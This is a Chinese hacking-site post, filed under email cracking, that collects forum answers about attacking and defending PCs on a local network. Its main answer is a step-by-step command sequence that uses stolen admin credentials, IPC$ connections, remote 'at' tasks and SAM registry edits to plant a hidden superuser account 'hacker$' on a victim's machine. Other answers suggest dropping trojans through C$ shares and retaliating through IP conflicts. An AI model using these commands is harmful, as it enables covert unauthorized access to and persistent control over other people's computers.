右侧
黑客技术
当前位置:网站首页 > 破解邮箱 > 正文

软件攻击局域网电脑_局域网攻击器

作者:hacker发布时间:2022-10-17分类:破解邮箱浏览:145评论:3


导读:导航:1、内网电脑,一直有网络攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?2、谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!3、局域网被P2P之...

导航:

内网电脑,一直有网络攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?

关于您遇到的问题

内网电脑,一直有网络攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?

让我感到很着急 让我来帮助您

从日志上看,您用的是火绒安全软件,攻击使用的是smbv1协议,火绒已经自动拦截该攻击不必过度担心

请找到169 22两台IP地址主机,使用杀毒软件彻底杀毒。

可以选择禁用该协议,这样会造成文件打印机共享出现问题

如有问题请追问 ,采纳可以帮助更多遇到此类问题的小伙伴,谢谢您的支持

谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!

我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP

地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。

在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。

对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)

2.先与他建立连接:

net

use

\\13.50.97.238\ipc$

"12345678"

/user:"Administrator”

3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):

at

\\13.50.97.238

12:51

c:\windows\system32\net.exe

user

hacker$

1234

/add

建立这个加有$符的用户名,是因为加有$符后,命令行下用net

user将不显示这个用户,但在帐户管理器却能看到这个用户。

4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:

at

\\13.50.97.238

12:55

c:\windows\regedit.exe

/e

hacker.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users

/e

是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe

/e

hacker.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。

5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:

Copy

\\13.50.97.238\admin$\system32\hacker.reg

c:\hacker.reg

6.再将编辑好的hacker.reg拷回他的电脑上

copy

c:\hacker.reg

\\13.50.97.238\admin$\system32\hacker1.reg

7.查看他的电脑时间:net

time

\\13.50.97.238然后用at命令将用户hacker$删除:

at

\\13.50.97.238

13:40

net

user

hacker$

/del

8.验证hacker$是否删除:net

use

\\13.50.97.238

/del

断开与他的电脑连接。

再用net

use

\\13.50.97.238\ipc$

"1234"

/user:"hacker$"

用帐户hacker$与他电脑连接,不能连接说明已删除。

9.再与他电脑建立连接:

net

use

\\13.50.97.238\ipc$

"12345678"

/user:"administrator"

再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:

at

\\13.50.97.238

13:41

c:\windows\regedit.exe

/s

hacker1.reg

regedit.exe的参数/s是指安静模式。

10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。

11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。

12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。

OK

以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~

局域网被P2P之类的软件攻击

p2p软件不会攻击局域网内其他计算机,只会占用带宽,造成其他计算机网速卡!

可以下载安装P2P终结者!限制一些p2p软件的带宽,或限制用p2p软件的计算机IP即可

局域网内个别用户用软件攻击搞得很多人上不了网怎么办?

朋友 我是开网吧的 也被攻击过 最好的办法就是 所有的机器下载个360

360里面有个保护.保护里面有个局域网保护...然后就没问题了..不占内存 也不会被攻击了 真的 我现在5个月没被攻击了

被攻击的时候电脑上不了网 IP全部错乱 装完了就 防护住了 很管用

给分吧

如何在局域网里攻击别人电脑?急求!

用灰鸽子也可以,不过也要学上一段时间,最简单的方法是,如果是同一局域网的话,知道到他的ip,然后在运行里面打上\\ip\c$,需要打用户名和密码,用户名打administrator,除非他没设置密码,你可以直接进入,然后可以任意改他c盘里面的东西,甚至直接放木马进去

局域网内有人用攻击软件怎么办?

你可借助360ARP拦截提示,追查出攻击你的真实IP地址.

然后将你的TCP/IP改为追查出攻击你的IP地址,此方法是利用IP冲突导致他也无法上网.

攻击者一般都是利用类似终结着的软件.而这类软件大多都是以网关欺骗的方式来拦截或转移你的数据包,从而导致你无法上线.

接着改你的DNS,不要继续使用你网内的DNS,将它改为外界一个可用的即可.比如改为公司电脑的DNS,或一个大型网吧的等...DNS还有特殊的功能,它可以提高IE浏缆速度.提高浏缆网页效果,加速硬件等..

标签:软件攻击局域网电脑


已有3位网友发表了看法:

  • 访客

    访客  评论于 2022-10-17 20:57:26  回复

    97.238然后用at命令将用户hacker$删除:at\\13.50.97.23813:40netuserhacker$/del8.验证hacker$是否删除:netuse\\13.50.97.238/del断开与他的电脑连接。再用netuse\\13.50.97.238\ipc$"1234"/

  • 访客

    访客  评论于 2022-10-17 18:02:56  回复

    rhacker$/del8.验证hacker$是否删除:netuse\\13.50.97.238/del断开与他的电脑连接。再用netuse\\13.50.97.238\ipc$"1234"/user:"hacker$"用帐户hacker$与他电脑连接,不能连接说明已删除。9.再与

  • 访客

    访客  评论于 2022-10-17 22:04:15  回复

    MACHINE\sam\sam\Domains\account\users下键值:at\\13.50.97.23812:55c:\windows\regedit.exe/ehacker

欢迎 发表评论:

破解邮箱排行
最近发表
标签列表